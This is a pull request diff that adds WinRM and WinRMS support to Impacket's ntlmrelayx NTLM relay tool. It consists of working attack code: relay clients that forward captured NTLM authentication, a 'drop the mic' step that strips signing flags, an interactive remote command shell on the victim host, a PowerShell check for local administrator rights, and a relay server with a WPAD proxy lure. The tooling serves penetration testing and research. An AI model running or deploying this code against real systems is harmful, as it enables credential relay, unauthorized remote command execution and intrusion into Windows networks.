### PR TITLE
[NTLMRELAYX] Implements WinRM(S) clients/server

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -52,7 +52,7 @@ from threading import Thread
 
 from impacket import version
 from impacket.examples import logger
-from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer
+from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer, WinRMRelayServer, WinRMSRelayServer
 from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig, parse_listening_ports
 from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
 from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
@@ -293,6 +293,7 @@ if __name__ == '__main__':
     serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
     serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server')
     serversoptions.add_argument('--no-raw-server', action='store_true', help='Disables the RAW server')
+    serversoptions.add_argument('--no-winrm-server', action='store_true', help='Disables the WinRM server')
 
     parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
     parser.add_argument('--http-port', help='Port(s) to listen on HTTP server. Can specify multiple ports by separating them with `,`, and ranges with `-`. Ex: `80,8000-8010`', default="80")
@@ -501,6 +502,10 @@ if __name__ == '__main__':
 
     if not options.no_raw_server:
         RELAY_SERVERS.append(RAWRelayServer)
+    
+    if not options.no_winrm_server:
+        RELAY_SERVERS.append(WinRMRelayServer)
+        RELAY_SERVERS.append(WinRMSRelayServer)
 
     if targetSystem is not None and options.w:
         watchthread = TargetsFileWatcher(targetSystem)

--- a/impacket/examples/ntlmrelayx/attacks/winrmattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/winrmattack.py
@@ -1,0 +1,260 @@
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright (C) 2023 Fortra. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   WinRM Attack Class
+#
+# Authors:
+#   Joe Mondloch (jmk@foofus.net)
+#   Aurélien Chalot (@Defte_)
+
+import re
+import cmd
+import sys
+import base64
+from impacket import LOG
+from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
+from impacket.examples.ntlmrelayx.utils.tcpshell import TcpShell
+
+PROTOCOL_ATTACK_CLASS = "WINRMAttack"
+
+class WinRMShell(cmd.Cmd):
+
+    def __init__(self, tcp_shell, client):
+        cmd.Cmd.__init__(self, stdin=tcp_shell.stdin, stdout=tcp_shell.stdout)
+
+        sys.stdout = tcp_shell.stdout
+        sys.stdin = tcp_shell.stdin
+        sys.stderr = tcp_shell.stdout
+
+        self.use_rawinput = False
+        self.shell = tcp_shell
+        self.client = client
+
+        self.prompt = "\n# "
+        self.tid = None
+        self.intro = "Type help for list of commands"
+        self.loggedIn = True
+        self.last_output = None
+        self.completion = []
+
+        self.shell_id = None
+
+         # Getting Shell ID
+        initiate_shell = '''
+        <?xml version="1.0" encoding="utf-8"?>
+        <env:Envelope
+            xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+            xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+            xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+            xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
+            xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">
+            <env:Header>
+                <a:To>http://windows-host:5985/wsman</a:To>
+                <a:ReplyTo>
+                    <a:Address mustUnderstand="true">
+                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
+                    </a:Address>
+                </a:ReplyTo>
+                <a:MessageID>uuid:2a8ac24f-00f0-4a87-860c-bf58d33a1e0a</a:MessageID>
+                <a:Action mustUnderstand="true">
+                    http://schemas.xmlsoap.org/ws/2004/09/transfer/Create
+                </a:Action>
+                <w:ResourceURI mustUnderstand="true">
+                    http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
+                </w:ResourceURI>
+                <w:OperationTimeout>PT20S</w:OperationTimeout>
+                <w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize>
+                <w:OptionSet>
+                    <w:Option Name="WINRS_NOPROFILE">FALSE</w:Option>
+                    <w:Option Name="WINRS_CODEPAGE">437</w:Option>
+                </w:OptionSet>
+                <w:Locale xml:lang="en-US"/>
+                <p:DataLocale xml:lang="en-US"/>
+            </env:Header>
+            <env:Body>
+                <rsp:Shell>
+                    <rsp:InputStreams>stdin</rsp:InputStreams>
+                    <rsp:OutputStreams>stdout stderr</rsp:OutputStreams>
+                </rsp:Shell>
+            </env:Body>
+        </env:Envelope>
+        '''
+
+        headers = {
+          "Content-Length": len(initiate_shell),
+          "Content-Type": "application/soap+xml;charset=UTF-8"
+        }
+
+        self.client.request("POST", "/wsman", headers=headers, body=initiate_shell)
+        res = self.client.getresponse()
+
+        # Retrieve ShellID
+        if match := re.search(r'<w:Selector\s+Name="ShellId">(.*?)</w:Selector>', res.read().decode()):
+            self.shell_id = match.group(1)
+
+    def emptyline(self):
+        pass
+
+    def onecmd(self, command):
+        if not command.strip():
+            return     
+
+        if command.strip() == "exit":
+            self.do_exit()
+
+        # Send Command XML
+        execute_command_xml = f'''
+        <?xml version="1.0" encoding="utf-8"?>
+        <env:Envelope
+            xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+            xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+            xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+            xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">
+            <env:Header>
+                <a:To>http://windows-host:5985/wsman</a:To>
+                <a:ReplyTo>
+                    <a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+                </a:ReplyTo>
+                <a:Action mustUnderstand="true">
+                    http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command
+                </a:Action>
+                <a:MessageID>uuid:10000000-0000-0000-0000-000000000002</a:MessageID>
+                <w:ResourceURI mustUnderstand="true">
+                    http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
+                </w:ResourceURI>
+                <w:SelectorSet>
+                    <w:Selector Name="ShellId">{self.shell_id}</w:Selector>
+                </w:SelectorSet>
+            </env:Header>
+            <env:Body>
+                <rsp:CommandLine>
+                    <rsp:Command>{command}</rsp:Command>
+                </rsp:CommandLine>
+            </env:Body>
+            </env:Envelope>
+            '''
+
+        self.client.request("POST", "/wsman", headers={
+            "Content-Length": str(len(execute_command_xml)),
+            "Content-Type": "application/soap+xml;charset=UTF-8"
+        }, body=execute_command_xml)
+
+        response = self.client.getresponse()
+        body = response.read().decode()
+
+        command_id = re.search(r"<rsp:CommandId>(.*?)</rsp:CommandId>", body).group(1)
+        receive_xml = f'''
+        <?xml version="1.0" encoding="utf-8"?>
+        <env:Envelope
+            xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+            xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+            xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+            xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">
+            <env:Header>
+                <a:To>http://windows-host:5985/wsman</a:To>
+                <a:ReplyTo>
+                    <a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+                </a:ReplyTo>
+                <a:Action mustUnderstand="true">
+                    http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive
+                </a:Action>
+                <a:MessageID>uuid:2a8ac24f-00f0-4a87-860c-bf58d33a1e0a</a:MessageID>
+                <w:ResourceURI mustUnderstand="true">
+                    http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
+                </w:ResourceURI>
+                <w:SelectorSet>
+                    <w:Selector Name="ShellId">{self.shell_id}</w:Selector>
+                </w:SelectorSet>
+            </env:Header>
+            <env:Body>
+                <rsp:Receive>
+                    <rsp:DesiredStream CommandId="{command_id}">stdout stderr</rsp:DesiredStream>
+                </rsp:Receive>
+            </env:Body>
+        </env:Envelope>
+        '''
+
+        self.client.request("POST", "/wsman", headers={
+            "Content-Length": str(len(receive_xml)),
+            "Content-Type": "application/soap+xml;charset=UTF-8"
+        }, body=receive_xml)
+
+        response = self.client.getresponse()
+        body = response.read().decode()
+
+        # Extract and decode output
+        matches = re.findall(r'<rsp:Stream Name="stdout"[^>]*>(.*?)</rsp:Stream>', body)
+        for match in matches:
+            try:
+                command_output = base64.b64decode(match).decode("utf-8", errors="ignore").strip()
+                if command_output:
+                    print(command_output)
+            except Exception as e:
+                LOG.error(f"Failed to decode output: {e}")
+                print(match)
+
+    def do_exit(self):
+        # This request is used to clean up the previously used ShellID
+        destroy_shell = f'''
+        <?xml version="1.0" encoding="utf-8"?>
+        <env:Envelope
+            xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+            xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+            xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd">
+            <env:Header>
+                <a:To>http://windows-host:5985/wsman</a:To>
+                <a:ReplyTo>
+                    <a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+                </a:ReplyTo>
+                <a:Action mustUnderstand="true">
+                    http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete
+                </a:Action>
+                <a:MessageID>uuid:10000000-0000-0000-0000-000000000004</a:MessageID>
+                <w:ResourceURI mustUnderstand="true">
+                    http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
+                </w:ResourceURI>
+                <w:SelectorSet>
+                    <w:Selector Name="ShellId">{self.shell_id}</w:Selector>
+                </w:SelectorSet>
+            </env:Header>
+            <env:Body/>
+        </env:Envelope>
+        '''
+
+        headers = {
+            "Content-Length": len(destroy_shell),
+            "Content-Type": "application/soap+xml;charset=UTF-8"
+        }
+
+        self.client.request("POST", "/wsman", headers=headers, body=destroy_shell)
+        res = self.client.getresponse()   
+        res.read()
+
+        if self.shell is not None:
+            self.shell.close()
+
+        LOG.info("WinRM shell destroyed successfully. You can now leave the NC shell :)")
+        return True
+
+    def do_EOF(self, line):
+        print("Bye!\n")
+        return True
+
+class WINRMAttack(ProtocolAttack):
+    PLUGIN_NAMES = ["WINRMS"]
+
+    def __init__(self, config, WINRMClient, username):
+        ProtocolAttack.__init__(self, config, WINRMClient, username)
+        self.tcp_shell = TcpShell()
+
+    def run(self):
+        LOG.info(f"Started interactive WinRMS shell via TCP on 127.0.0.1:{self.tcp_shell.port}") 
+        self.tcp_shell.listen()
+        shell = WinRMShell(self.tcp_shell, self.client)
+        shell.cmdloop()

--- a/impacket/examples/ntlmrelayx/clients/winrmrelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/winrmrelayclient.py
@@ -1,0 +1,394 @@
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright (C) 2022 Fortra. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   WinRM Protocol Client
+#   WinRM for HTTPS client for relaying NTLMSSP authentication
+#
+# Authors:
+#   Joe Mondloch (jmk@foofus.net)
+#   Aurélien Chalot (@Defte_)
+
+import re
+import ssl
+try:
+    from http.client import HTTPConnection, HTTPSConnection
+except ImportError:
+    from httplib import HTTPConnection, HTTPSConnection
+import base64
+
+from struct import unpack
+from impacket import LOG
+from impacket.examples.ntlmrelayx.clients import ProtocolClient
+from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED
+from impacket.ntlm import NTLMAuthChallenge, NTLMAuthNegotiate, NTLMSSP_NEGOTIATE_SIGN, NTLMSSP_NEGOTIATE_ALWAYS_SIGN
+from impacket.spnego import SPNEGO_NegTokenResp
+
+PROTOCOL_CLIENT_CLASSES = ["WinRMRelayClient", "WinRMSRelayClient"]
+
+class WinRMRelayClient(ProtocolClient):
+    PLUGIN_NAME = "WINRM"
+
+    def __init__(self, serverConfig, target, targetPort = 5985, extendedSecurity=True):
+        ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity)
+        self.extendedSecurity = extendedSecurity
+        self.negotiateMessage = None
+        self.authenticateMessageBlob = None
+        self.server = None
+        self.authenticationMethod = None
+        self.isFirstNeg = True
+        self.basic_xml_data = "<xml></xml>"
+
+    def initConnection(self):
+        self.session = HTTPConnection(self.targetHost, self.targetPort)
+        self.lastresult = None
+        if self.target.path == "":
+            self.path = "/wsman"
+        else:
+            self.path = self.target.path
+        return True
+
+    def sendNegotiate(self, negotiateMessage):
+        negoMessage = NTLMAuthNegotiate()
+        negoMessage.fromString(negotiateMessage)
+
+        # Drop the mic exploit
+        # WinRMs servers is configured to use CBT if client requests it which is the case of SMB with NTLMv2 (as I found out quite hard :D)
+        if self.serverConfig.remove_mic:
+            if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
+                negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
+            if negoMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
+                negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
+
+        self.negotiateMessage = negoMessage.getData()
+
+        # Warn if the relayed target requests signing, which will break our attack
+        if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
+            LOG.warning('The client requested signing, relaying to WinRMS migh not work!')
+
+        headers = {
+            "Content-Length": len(self.basic_xml_data),
+            "Content-Type": "application/soap+xml;charset=UTF-8"
+        }
+        self.session.request("POST", self.path, headers=headers, body=self.basic_xml_data)
+        res = self.session.getresponse()
+        res.read()
+
+        if res.status != 401:
+            LOG.info(f"Status code returned: {res.status}. Authentication does not seem required for URL")
+        try:
+            if "NTLM" not in res.getheader("WWW-Authenticate") and "Negotiate" not in res.getheader("WWW-Authenticate"):
+                LOG.error(f"NTLM Auth not offered by URL, offered protocols: {res.getheader('WWW-Authenticate')}")
+                return False
+            if "NTLM" in res.getheader("WWW-Authenticate"):
+                self.authenticationMethod = "NTLM"
+            elif "Negotiate" in res.getheader("WWW-Authenticate"):
+                self.authenticationMethod = "Negotiate"
+        except (KeyError, TypeError):
+            LOG.error(f"No authentication requested by the server for url {self.targetHost}")
+            if self.serverConfig.isADCSAttack:
+                LOG.info("IIS cert server may allow anonymous authentication, sending NTLM auth anyways")
+                self.authenticationMethod = "NTLM"
+            else:
+                return False
+
+        negotiate = base64.b64encode(negotiateMessage).decode("ascii")
+        headers = {
+            "Authorization": f"{self.authenticationMethod} {negotiate}",
+            "Content-Type": "application/soap+xml;charset=UTF-8",
+            "Content-Length": len(self.basic_xml_data)
+        }
+        self.session.request("POST", self.path, headers=headers, body=self.basic_xml_data)
+        res = self.session.getresponse()
+        res.read()
+
+        try:
+            serverChallengeBase64 = re.search(('%s ([a-zA-Z0-9+/]+={0,2})' % self.authenticationMethod), res.getheader('WWW-Authenticate')).group(1)
+            serverChallenge = base64.b64decode(serverChallengeBase64)
+            challenge = NTLMAuthChallenge()
+            challenge.fromString(serverChallenge)
+            return challenge
+        except (IndexError, KeyError, AttributeError):
+            LOG.error("No NTLM challenge returned from server")
+            return False
+
+    def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
+        if unpack("B", authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
+            respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
+            token = respToken2["ResponseToken"]
+        else:
+            token = authenticateMessageBlob
+
+        auth = base64.b64encode(token).decode("ascii")
+        headers = {
+            "Authorization": f"{self.authenticationMethod} {auth}",
+            "Content-Type": "application/soap+xml;charset=UTF-8",
+            "Content-Length": len(self.basic_xml_data)
+        }
+        self.session.request("POST", self.path, headers=headers, body=self.basic_xml_data)
+
+        res = self.session.getresponse()
+        if res.status == 401:
+            return None, STATUS_ACCESS_DENIED
+        else:
+            LOG.info(f"HTTP server returned error code {res.status}, this is expected, treating as a successful login")
+            self.lastresult = res.read()
+            return None, STATUS_SUCCESS
+
+    def killConnection(self):
+        if self.session is not None:
+            self.session.close()
+            self.session = None
+
+    def isAdmin(self):
+        initiate_shell = '''
+        <?xml version="1.0" encoding="utf-8"?>
+            <env:Envelope
+                xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+                xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+                xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+                xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
+                xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">
+                <env:Header>
+                    <a:To>http://windows-host:5985/wsman</a:To>
+                    <a:ReplyTo>
+                        <a:Address mustUnderstand="true">
+                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
+                        </a:Address>
+                    </a:ReplyTo>
+                    <a:MessageID>uuid:2a8ac24f-00f0-4a87-860c-bf58d33a1e0a</a:MessageID>
+                    <a:Action mustUnderstand="true">
+                        http://schemas.xmlsoap.org/ws/2004/09/transfer/Create
+                    </a:Action>
+                    <w:ResourceURI mustUnderstand="true">
+                        http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
+                    </w:ResourceURI>
+                    <w:OperationTimeout>PT20S</w:OperationTimeout>
+                    <w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize>
+                    <w:OptionSet>
+                        <w:Option Name="WINRS_NOPROFILE">FALSE</w:Option>
+                        <w:Option Name="WINRS_CODEPAGE">437</w:Option>
+                    </w:OptionSet>
+                    <w:Locale xml:lang="en-US"/>
+                    <p:DataLocale xml:lang="en-US"/>
+                </env:Header>
+                <env:Body>
+                    <rsp:Shell>
+                        <rsp:InputStreams>stdin</rsp:InputStreams>
+                        <rsp:OutputStreams>stdout stderr</rsp:OutputStreams>
+                    </rsp:Shell>
+                </env:Body>
+            </env:Envelope>
+        '''
+
+        headers = {
+          "Content-Length": len(initiate_shell),
+          "Content-Type": "application/soap+xml;charset=UTF-8"
+        }
+
+        self.session.request("POST", self.path, headers=headers, body=initiate_shell)
+        res = self.session.getresponse()
+
+        match = re.search(r'<w:Selector\s+Name="ShellId">(.*?)</w:Selector>', res.read().decode())
+        if match:
+            shell_id = match.group(1)
+            get_command_id = f'''
+            <?xml version="1.0" encoding="utf-8"?>
+            <env:Envelope
+                xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+                xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+                xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+                xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">
+                <env:Header>
+                    <a:To>http://windows-host:5985/wsman</a:To>
+                    <a:ReplyTo>
+                        <a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+                    </a:ReplyTo>
+                    <a:Action mustUnderstand="true">
+                        http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command
+                    </a:Action>
+                    <a:MessageID>uuid:10000000-0000-0000-0000-000000000002</a:MessageID>
+                    <w:ResourceURI mustUnderstand="true">
+                        http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
+                    </w:ResourceURI>
+                    <w:SelectorSet>
+                        <w:Selector Name="ShellId">{shell_id}</w:Selector>
+                    </w:SelectorSet>
+                </env:Header>
+                <env:Body>
+                    <rsp:CommandLine>
+                        <rsp:Command>powershell -c "[bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match 'S-1-5-32-544')"</rsp:Command>
+                    </rsp:CommandLine>
+                </env:Body>
+            </env:Envelope>
+            '''
+
+            headers = {
+                "Content-Length": len(get_command_id),
+                "Content-Type": "application/soap+xml;charset=UTF-8"
+            }
+
+            self.session.request("POST", self.path, headers=headers, body=get_command_id)
+            res = self.session.getresponse()
+            match = re.search(r'<rsp:CommandId>(.*?)</rsp:CommandId>', res.read().decode())
+            if match:
+                command_id = match.group(1)
+                check_if_admin = f'''
+                <?xml version="1.0" encoding="utf-8"?>
+                    <env:Envelope
+                        xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+                        xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+                        xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+                        xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">
+                        <env:Header>
+                            <a:To>http://windows-host:5985/wsman</a:To>
+                            <a:ReplyTo>
+                                <a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+                            </a:ReplyTo>
+                            <a:Action mustUnderstand="true">
+                                http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive
+                            </a:Action>
+                            <a:MessageID>uuid:10000000-0000-0000-0000-000000000003</a:MessageID>
+                            <w:ResourceURI mustUnderstand="true">
+                                http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
+                            </w:ResourceURI>
+                            <w:SelectorSet>
+                                <w:Selector Name="ShellId">{shell_id}</w:Selector>
+                            </w:SelectorSet>
+                        </env:Header>
+                        <env:Body>
+                            <rsp:Receive>
+                                <rsp:DesiredStream CommandId="{command_id}">stdout stderr</rsp:DesiredStream>
+                            </rsp:Receive>
+                        </env:Body>
+                    </env:Envelope>
+                '''
+
+                headers = {
+                    "Content-Length": len(check_if_admin),
+                    "Content-Type": "application/soap+xml;charset=UTF-8"
+                }
+
+                self.session.request("POST", self.path, headers=headers, body=check_if_admin)
+                res = self.session.getresponse()
+                body = res.read().decode()
+
+                stdout_matches = re.findall(r'<rsp:Stream\s+Name="stdout"[^>]*>(.*?)</rsp:Stream>', body)
+                decoded_output = ''.join([base64.b64decode(match).decode("utf-8") for match in stdout_matches])
+
+                # This request is used to clean up the shell
+                destroy_shell = f'''
+                <?xml version="1.0" encoding="utf-8"?>
+                <env:Envelope
+                    xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+                    xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+                    xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd">
+                    <env:Header>
+                        <a:To>http://windows-host:5985/wsman</a:To>
+                        <a:ReplyTo>
+                            <a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+                        </a:ReplyTo>
+                        <a:Action mustUnderstand="true">
+                            http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete
+                        </a:Action>
+                        <a:MessageID>uuid:10000000-0000-0000-0000-000000000004</a:MessageID>
+                        <w:ResourceURI mustUnderstand="true">
+                            http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
+                        </w:ResourceURI>
+                        <w:SelectorSet>
+                            <w:Selector Name="ShellId">{shell_id}</w:Selector>
+                        </w:SelectorSet>
+                    </env:Header>
+                    <env:Body/>
+                </env:Envelope>
+                '''
+
+                headers = {
+                    "Content-Length": len(destroy_shell),
+                    "Content-Type": "application/soap+xml;charset=UTF-8"
+                }
+
+                self.session.request("POST", self.path, headers=headers, body=destroy_shell)
+                res = self.session.getresponse()   
+                res.read()
+
+                # However we want to return if the relayed user is admin or not :D
+                if decoded_output.strip() == "True":
+                    return "TRUE"
+                else:
+                    return "FALSE"
+
+    def keepAlive(self):
+        heartbeat_xml = '''
+        <?xml version="1.0" encoding="utf-8"?>
+            <env:Envelope
+                xmlns:env="http://www.w3.org/2003/05/soap-envelope"
+                xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+                xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
+                xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
+                xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell">
+                <env:Header>
+                    <a:To>http://windows-host:5985/wsman</a:To>
+                    <a:ReplyTo>
+                        <a:Address mustUnderstand="true">
+                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
+                        </a:Address>
+                    </a:ReplyTo>
+                    <a:MessageID>uuid:2a8ac24f-00f0-4a87-860c-bf58d33a1e0a</a:MessageID>
+                    <a:Action mustUnderstand="true">
+                        http://schemas.xmlsoap.org/ws/2004/09/transfer/Create
+                    </a:Action>
+                    <w:ResourceURI mustUnderstand="true">
+                        http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
+                    </w:ResourceURI>
+                    <w:OperationTimeout>PT20S</w:OperationTimeout>
+                    <w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize>
+                    <w:OptionSet>
+                        <w:Option Name="WINRS_NOPROFILE">FALSE</w:Option>
+                        <w:Option Name="WINRS_CODEPAGE">437</w:Option>
+                    </w:OptionSet>
+                    <w:Locale xml:lang="en-US"/>
+                    <p:DataLocale xml:lang="en-US"/>
+                </env:Header>
+                <env:Body>
+                    <rsp:Shell>
+                        <rsp:InputStreams>stdin</rsp:InputStreams>
+                        <rsp:OutputStreams>stdout stderr</rsp:OutputStreams>
+                    </rsp:Shell>
+                </env:Body>
+            </env:Envelope>
+       '''
+
+        headers = {
+            "Content-Length": len(heartbeat_xml),
+            "Content-Type": "application/soap+xml;charset=UTF-8"
+        }
+
+        self.session.request("POST", self.path, headers=headers, body=heartbeat_xml)
+        res = self.session.getresponse()
+        res.read()
+
+class WinRMSRelayClient(WinRMRelayClient):
+    PLUGIN_NAME = "WINRMS"
+
+    def __init__(self, serverConfig, target, targetPort = 5986, extendedSecurity=True ):
+        WinRMRelayClient.__init__(self, serverConfig, target, targetPort, extendedSecurity)
+
+    def initConnection(self):
+        self.lastresult = None
+        if self.target.path == "":
+            self.path = "/wsman"
+        else:
+            self.path = self.target.path
+        try:
+            uv_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+            self.session = HTTPSConnection(self.targetHost, self.targetPort, context=uv_context)
+        except AttributeError:
+            self.session = HTTPSConnection(self.targetHost, self.targetPort)
+        return True
+

--- a/impacket/examples/ntlmrelayx/servers/__init__.py
+++ b/impacket/examples/ntlmrelayx/servers/__init__.py
@@ -12,3 +12,5 @@ from impacket.examples.ntlmrelayx.servers.httprelayserver import HTTPRelayServer
 from impacket.examples.ntlmrelayx.servers.smbrelayserver import SMBRelayServer
 from impacket.examples.ntlmrelayx.servers.wcfrelayserver import WCFRelayServer
 from impacket.examples.ntlmrelayx.servers.rawrelayserver import RAWRelayServer
+from impacket.examples.ntlmrelayx.servers.winrmrelayserver import WinRMRelayServer
+from impacket.examples.ntlmrelayx.servers.winrmsrelayserver import WinRMSRelayServer

--- a/impacket/examples/ntlmrelayx/servers/winrmrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/winrmrelayserver.py
@@ -1,0 +1,551 @@
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright (C) 2022 Fortra. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   WinRM (HTTP) Relay Server
+#
+#   This is the WinRM (HTTP) server which relays the NTLMSSP  messages to other protocols
+#
+# Authors:
+#   Joe Mondloch (jmk@foofus.net)
+#   Aurélien Chalot (@Defte_)
+
+import http.server
+import socketserver
+import socket
+import base64
+import random
+import struct
+import string
+from threading import Thread
+from six import PY2, b
+
+from impacket import ntlm, LOG
+from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile
+from impacket.nt_errors import STATUS_ACCESS_DENIED, STATUS_SUCCESS
+from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
+from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections
+
+class WinRMRelayServer(Thread):
+
+    class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
+        def __init__(self, server_address, RequestHandlerClass, config):
+            self.config = config
+            self.daemon_threads = True
+            if self.config.ipv6:
+                self.address_family = socket.AF_INET6
+            # Tracks the number of times authentication was prompted for WPAD per client
+            self.wpad_counters = {}
+            socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
+
+    class HTTPHandler(http.server.SimpleHTTPRequestHandler):
+        def __init__(self,request, client_address, server):
+            self.server_version = 'Microsoft-HTTPAPI/2.0'
+            self.sys_version = ''
+            self.server = server
+            self.protocol_version = 'HTTP/1.1'
+            self.challengeMessage = None
+            self.target = None
+            self.client = None
+            self.machineAccount = None
+            self.machineHashes = None
+            self.domainIp = None
+            self.authUser = None
+            self.relayToHost = False
+            self.isFirstNeg = True
+            self.negotiation_count = 0 
+            self.wpad = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||' \
+                        '(host == "127.0.0.1")) return "DIRECT"; if (dnsDomainIs(host, "%s")) return "DIRECT"; ' \
+                        'return "PROXY %s:80; DIRECT";} '
+            if self.server.config.mode != 'REDIRECT':
+                if self.server.config.target is None:
+                    # Reflection mode, defaults to SMB at the target, for now
+                    self.server.config.target = TargetsProcessor(singleTarget='SMB://%s:445/' % client_address[0])
+            try:
+                http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
+            except Exception as e:
+                LOG.debug("Exception:", exc_info=True)
+                LOG.error(str(e))
+
+        def handle_one_request(self):
+            try:
+                http.server.SimpleHTTPRequestHandler.handle_one_request(self)
+            except KeyboardInterrupt:
+                raise
+            except Exception as e:
+                LOG.debug("WinRM(%s): Exception:" % self.server.server_address[1], exc_info=True)
+
+        def log_message(self, format, *args):
+            return
+
